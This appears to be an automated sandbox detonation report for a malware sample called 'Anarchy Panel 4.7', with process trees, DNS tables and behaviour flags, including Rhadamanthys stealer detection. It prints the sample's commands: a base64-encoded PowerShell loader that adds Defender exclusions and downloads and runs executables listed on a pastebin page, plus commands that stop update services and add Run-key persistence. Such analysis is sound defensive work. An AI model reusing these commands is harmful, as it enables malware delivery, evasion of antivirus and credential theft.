| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
Files
memory/2684-134-0x00007FF9329F0000-0x00007FF932BE5000-memory.dmp
memory/2684-133-0x00007FF8F2A70000-0x00007FF8F2A80000-memory.dmp
memory/2684-135-0x00007FF9329F0000-0x00007FF932BE5000-memory.dmp
memory/2684-136-0x00007FF9305C0000-0x00007FF930889000-memory.dmp
memory/2684-137-0x00007FF8F2A70000-0x00007FF8F2A80000-memory.dmp
memory/2684-138-0x00007FF9329F0000-0x00007FF932BE5000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1561s
Max time network
1568s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll",#1
Network
Files
Analysis: behavioral16
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
829s
Max time network
1160s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.13.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral29
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1556s
Max time network
1560s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mGWHaG2Jn.dll",#1
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
786s
Max time network
1125s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\0guo3zbo66fqoG.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
1157s
Max time network
1163s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\59Zp7paEHDF7luJ.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
1145s
Max time network
1153s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\FBSyChwp.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1559s
Max time network
1562s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\PK0TcnqTGFagQTS.dll",#1
Network
Files
Analysis: behavioral20
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
1162s
Max time network
1168s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\PK0TcnqTGFagQTS.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1559s
Max time network
1564s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll",#1
Network
Files
Analysis: behavioral26
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
1644s
Max time network
1143s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.13.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.162.46.104.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win7-20230712-en
Max time kernel
1566s
Max time network
1569s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1580 wrote to memory of 1936 | N/A | C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1580 wrote to memory of 1936 | N/A | C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1580 wrote to memory of 1936 | N/A | C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1580 wrote to memory of 1936 | N/A | C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe
"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
Files
memory/1936-55-0x0000000074470000-0x0000000074A1B000-memory.dmp
memory/1936-56-0x0000000074470000-0x0000000074A1B000-memory.dmp
memory/1936-57-0x0000000002670000-0x00000000026B0000-memory.dmp
memory/1936-58-0x0000000002670000-0x00000000026B0000-memory.dmp
memory/1936-59-0x0000000074470000-0x0000000074A1B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-07-19 00:36
Reported
2023-07-19 01:07
Platform
win10v2004-20230703-en
Max time kernel
1800s
Max time network
1149s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4860 created 3156 | N/A | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe | C:\Windows\Explorer.EXE |
| PID 4860 created 3156 | N/A | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe | C:\Windows\Explorer.EXE |
| PID 4860 created 3156 | N/A | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe | C:\Windows\Explorer.EXE |
| PID 4860 created 3156 | N/A | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe | C:\Windows\Explorer.EXE |
| PID 4860 created 3156 | N/A | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe | C:\Windows\Explorer.EXE |
| PID 448 created 3156 | N/A | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe | C:\Windows\Explorer.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4860 set thread context of 4456 | N/A | C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe | C:\Windows\System32\dialer.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\winlogon.exe |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\dwm.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dialer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe
"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe
"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe"
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe
"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe"
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe
"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe"
C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe
"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
